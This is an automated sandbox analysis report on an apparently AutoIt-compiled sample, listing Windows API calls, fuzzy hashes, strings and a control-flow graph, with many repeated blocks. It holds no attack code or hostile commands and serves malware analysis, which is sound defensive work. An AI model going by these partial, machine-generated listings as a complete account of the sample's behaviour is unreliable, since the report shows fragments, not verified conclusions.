                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: pbl$%i
                                                                                                                • API String ID: 3964851224-2864806806
                                                                                                                • Opcode ID: e864b347f084b9258a16a523366f8c70b8d8f966984cc2d8ce7002bb9447c706
                                                                                                                • Instruction ID: 77235bc1cf99cc9b3a644d84831923ba0f607062e2faa5111d14084409b54cb5
                                                                                                                • Opcode Fuzzy Hash: e864b347f084b9258a16a523366f8c70b8d8f966984cc2d8ce7002bb9447c706
                                                                                                                • Instruction Fuzzy Hash: 06926C70508341DFDB24DF14C481BAAB7E2BF89304F18896DE8998B352DB75EC85CB96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Ddl$Ddl$Ddl$Ddl$Variable must be of type 'Object'.
                                                                                                                • API String ID: 0-483630429
                                                                                                                • Opcode ID: 4640367e4d54c64715edc01b49d58566563348ba291eb37a33aba0612f97acdc
                                                                                                                • Instruction ID: 40c066cb337d641d3ad093182d044dd8c2fdd8f7d162787e742338158fe71351
                                                                                                                • Opcode Fuzzy Hash: 4640367e4d54c64715edc01b49d58566563348ba291eb37a33aba0612f97acdc
                                                                                                                • Instruction Fuzzy Hash: D8A28F74A40225CFCB28CF58C480AAEB7B3FF59314F248869E9159B391D776ED42CB94
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,0063E398), ref: 0066446A
                                                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0066447B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066448B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 48322524-0
                                                                                                                • Opcode ID: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
                                                                                                                • Instruction ID: f27d02f7b16f2ac984909d2ce47068ce2a7b53d4a565f99e0e2a4af7764c59bf
                                                                                                                • Opcode Fuzzy Hash: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
                                                                                                                • Instruction Fuzzy Hash: 9CE0DF328109007B8310AB78EC1E8EA779EDE45336F200726F835C21E0EFB49E0096D6
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610A5B
                                                                                                                • timeGetTime.WINMM ref: 00610D16
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610E53
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00610E61
                                                                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 00610EFA
                                                                                                                • DestroyWindow.USER32 ref: 00610F06
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00610F20
                                                                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00644E83
                                                                                                                • TranslateMessage.USER32(?), ref: 00645C60
                                                                                                                • DispatchMessageW.USER32(?), ref: 00645C6E
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00645C82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbl$pbl$pbl$pbl
                                                                                                                • API String ID: 4212290369-2343256454
                                                                                                                • Opcode ID: a369e0f3ad3c59cc39540c5a9da5cdab37a3df1b4151b4c4dc8155848b44d6c4
                                                                                                                • Instruction ID: c3dbd107c588f522dbfd9f56dacfd45784933c7a746462fecf7f3221c0f27862
                                                                                                                • Opcode Fuzzy Hash: a369e0f3ad3c59cc39540c5a9da5cdab37a3df1b4151b4c4dc8155848b44d6c4
                                                                                                                • Instruction Fuzzy Hash: AAB2A270608741DFDB28DF24C845BAAB7E7BF84304F14491DF48A972A2DB71E885CB96

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00668F5F: __time64.LIBCMT ref: 00668F69
                                                                                                                  • Part of subcall function 00604EE5: _fseek.LIBCMT ref: 00604EFD
                                                                                                                • __wsplitpath.LIBCMT ref: 00669234
                                                                                                                  • Part of subcall function 006240FB: __wsplitpath_helper.LIBCMT ref: 0062413B
                                                                                                                • _wcscpy.LIBCMT ref: 00669247
                                                                                                                • _wcscat.LIBCMT ref: 0066925A
                                                                                                                • __wsplitpath.LIBCMT ref: 0066927F
                                                                                                                • _wcscat.LIBCMT ref: 00669295
                                                                                                                • _wcscat.LIBCMT ref: 006692A8
                                                                                                                  • Part of subcall function 00668FA5: _memmove.LIBCMT ref: 00668FDE
                                                                                                                  • Part of subcall function 00668FA5: _memmove.LIBCMT ref: 00668FED
                                                                                                                • _wcscmp.LIBCMT ref: 006691EF
                                                                                                                  • Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669824
                                                                                                                  • Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669837
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00669452
                                                                                                                • _wcsncpy.LIBCMT ref: 006694C5
                                                                                                                • DeleteFileW.KERNEL32(?,?), ref: 006694FB
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00669511
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00669522
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00669534
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1500180987-0
                                                                                                                • Opcode ID: 8431a4947d3a3ed6b32bf7fc9fe742e592fe7d484edf245d510e077d7a553c5b
                                                                                                                • Instruction ID: 77e67e22380e840cf1a5180112e477eeddf1319f16a4a81d1096e97ddc25eea7
                                                                                                                • Opcode Fuzzy Hash: 8431a4947d3a3ed6b32bf7fc9fe742e592fe7d484edf245d510e077d7a553c5b
                                                                                                                • Instruction Fuzzy Hash: 3FC15FB1D00229ABDF61DFA5CC81ADEB7BEEF45310F0040AAF609E7241DB309A458F65

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00603074
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 0060309E
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 006030CC
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
                                                                                                                • LoadIconW.USER32(000000A9), ref: 006030F2
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: a0915962a5d928fc5696f11739a0bf0a4a5a846195180f5c48b435a74df926e2
                                                                                                                • Instruction ID: 37c40da23bd3bd447d55fd5ccb60959001ef5b2a78e8f226da2e484d5d7e2058
                                                                                                                • Opcode Fuzzy Hash: a0915962a5d928fc5696f11739a0bf0a4a5a846195180f5c48b435a74df926e2
                                                                                                                • Instruction Fuzzy Hash: 733149B1851358EFEB009FA4EC45AE9BFF2FB09310F14526AE541EA2A0D3B51585CF91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00603074
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 0060309E
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 006030CC
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
                                                                                                                • LoadIconW.USER32(000000A9), ref: 006030F2
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 5938ad1dec13c2f01d68ecede00c5ab9cb534a0348435ccbc382a1cdd00c90b8
                                                                                                                • Instruction ID: edf04f397e038d64fa08b6ae38f1431ec09050ddde90c9834a35f6953656c5a6
                                                                                                                • Opcode Fuzzy Hash: 5938ad1dec13c2f01d68ecede00c5ab9cb534a0348435ccbc382a1cdd00c90b8
                                                                                                                • Instruction Fuzzy Hash: 7821C7B1952218AFEB00DFA4EC49B9DBBF6FB08710F10522AF512A62A0D7B555848F91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00604706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006C52F8,?,006037AE,?), ref: 00604724
                                                                                                                  • Part of subcall function 0062050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00607165), ref: 0062052D
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006071A8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0063E8C8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0063E909
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0063E947
                                                                                                                • _wcscat.LIBCMT ref: 0063E9A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                • API String ID: 2673923337-2727554177
                                                                                                                • Opcode ID: b5deaed022902a1fe8ce94ef7d8daca53b0bfc23a835876079b24d8ba9f57ddd
                                                                                                                • Instruction ID: 8bcb9f8849c7ec7d84082cad0ced5c78bb8e11d3bce81281690a5dc3f380d5d9
                                                                                                                • Opcode Fuzzy Hash: b5deaed022902a1fe8ce94ef7d8daca53b0bfc23a835876079b24d8ba9f57ddd
                                                                                                                • Instruction Fuzzy Hash: 90718171548301AEC744EF25EC41DABBBEAFF84350F40152EF445872E1DB75AA48CBAA

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 760 603633-603681 762 6036e1-6036e3 760->762 763 603683-603686 760->763 762->763 766 6036e5 762->766 764 6036e7 763->764 765 603688-60368f 763->765 770 6036ed-6036f0 764->770 771 63d0cc-63d0fa call 611070 call 611093 764->771 767 603695-60369a 765->767 768 60374b-603753 PostQuitMessage 765->768 769 6036ca-6036d2 DefWindowProcW 766->769 775 6036a0-6036a2 767->775 776 63d154-63d168 call 662527 767->776 777 603711-603713 768->777 778 6036d8-6036de 769->778 772 6036f2-6036f3 770->772 773 603715-60373c SetTimer RegisterWindowMessageW 770->773 806 63d0ff-63d106 771->806 779 6036f9-60370c KillTimer call 60443a call 603114 772->779 780 63d06f-63d072 772->780 773->777 782 60373e-603749 CreatePopupMenu 773->782 783 603755-60375f call 6044a0 775->783 784 6036a8-6036ad 775->784 776->777 799 63d16e 776->799 777->778 779->777 792 63d074-63d076 780->792 793 63d0a8-63d0c7 MoveWindow 780->793 782->777 800 603764 783->800 788 6036b3-6036b8 784->788 789 63d139-63d140 784->789 797 63d124-63d134 call 662d36 788->797 798 6036be-6036c4 788->798 789->769 795 63d146-63d14f call 657c36 789->795 801 63d097-63d0a3 SetFocus 792->801 802 63d078-63d07b 792->802 793->777 795->769 797->777 798->769 798->806 799->769 800->777 801->777 802->798 807 63d081-63d092 call 611070 802->807 806->769 811 63d10c-63d11f call 60443a call 60434a 806->811 807->777 811->769
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 006036D2
                                                                                                                • KillTimer.USER32(?,00000001), ref: 006036FC
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0060371F
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060372A
                                                                                                                • CreatePopupMenu.USER32 ref: 0060373E
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 0060374D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated$%i
                                                                                                                • API String ID: 129472671-2085807306
                                                                                                                • Opcode ID: 6e5bc1647bcabc62c80789a7e6310fc2ac87b49e697b2e8678a9c01edee7b352
                                                                                                                • Instruction ID: e1cd22a806b8c7392586b0b883dc921547d3669dde2feed65b6a5a4d5e67f424
                                                                                                                • Opcode Fuzzy Hash: 6e5bc1647bcabc62c80789a7e6310fc2ac87b49e697b2e8678a9c01edee7b352
                                                                                                                • Instruction Fuzzy Hash: E5417DB1190515BBDB1C5F68EC09FBB379FEB00302F500129F603863E1DB66AE819369

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00603A50
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00603A5F
                                                                                                                • LoadIconW.USER32(00000063), ref: 00603A76
                                                                                                                • LoadIconW.USER32(000000A4), ref: 00603A88
                                                                                                                • LoadIconW.USER32(000000A2), ref: 00603A9A
                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AC0
                                                                                                                • RegisterClassExW.USER32(?), ref: 00603B16
                                                                                                                  • Part of subcall function 00603041: GetSysColorBrush.USER32(0000000F), ref: 00603074
                                                                                                                  • Part of subcall function 00603041: RegisterClassExW.USER32(00000030), ref: 0060309E
                                                                                                                  • Part of subcall function 00603041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
                                                                                                                  • Part of subcall function 00603041: InitCommonControlsEx.COMCTL32(?), ref: 006030CC
                                                                                                                  • Part of subcall function 00603041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
                                                                                                                  • Part of subcall function 00603041: LoadIconW.USER32(000000A9), ref: 006030F2
                                                                                                                  • Part of subcall function 00603041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: 457e9eed8493ea68dde40fd7a5523a3ed7c229317f8864a038fead85a347e2ae
                                                                                                                • Instruction ID: 3491588a668bc780acdaea0ba6a30cdcaed9a37d9e277c7e2899705a4e46b949
                                                                                                                • Opcode Fuzzy Hash: 457e9eed8493ea68dde40fd7a5523a3ed7c229317f8864a038fead85a347e2ae
                                                                                                                • Instruction Fuzzy Hash: 90212E71D40304AFEB10DFA4EC49FAD7BF6FB08711F105119F505A62A1D7B9A6908F94

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rl
                                                                                                                • API String ID: 1825951767-3520598783
                                                                                                                • Opcode ID: b89c835fdfb5319d08536a80babaab7a41198ec219d5d8d7afe5a06883e28cb4
                                                                                                                • Instruction ID: c3a5acd3c5c7751da11e1bb857fafbc2d5a1b1cdb47e3d342740d95439a0d1c0
                                                                                                                • Opcode Fuzzy Hash: b89c835fdfb5319d08536a80babaab7a41198ec219d5d8d7afe5a06883e28cb4
                                                                                                                • Instruction Fuzzy Hash: 71A13C7195022D9ACB48EBA4DC51EEFB77ABF14310F40052EE416A72D1EF746A08CBA4

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00620162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00620193
                                                                                                                  • Part of subcall function 00620162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0062019B
                                                                                                                  • Part of subcall function 00620162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006201A6
                                                                                                                  • Part of subcall function 00620162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006201B1
                                                                                                                  • Part of subcall function 00620162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006201B9
                                                                                                                  • Part of subcall function 00620162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006201C1
                                                                                                                  • Part of subcall function 006160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0060F930), ref: 00616154
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0060F9CD
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0060FA4A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006445C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID: <Wl$\Tl$%i$Sl
                                                                                                                • API String ID: 1986988660-2472473219
                                                                                                                • Opcode ID: b201fe5f77d9319a676381de6f2905f4d54d3793c5e2af536b6f5160c6fa71cf
                                                                                                                • Instruction ID: e6efaa9157eca8fa1ea4fedab725c29b4e54f563c7f075e6876624babcc4f13d
                                                                                                                • Opcode Fuzzy Hash: b201fe5f77d9319a676381de6f2905f4d54d3793c5e2af536b6f5160c6fa71cf
                                                                                                                • Instruction Fuzzy Hash: 2B81A0B0911A80CFC388DF29AD44E797BE7EB98306790A12ED01BCB261E77464C58F55

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
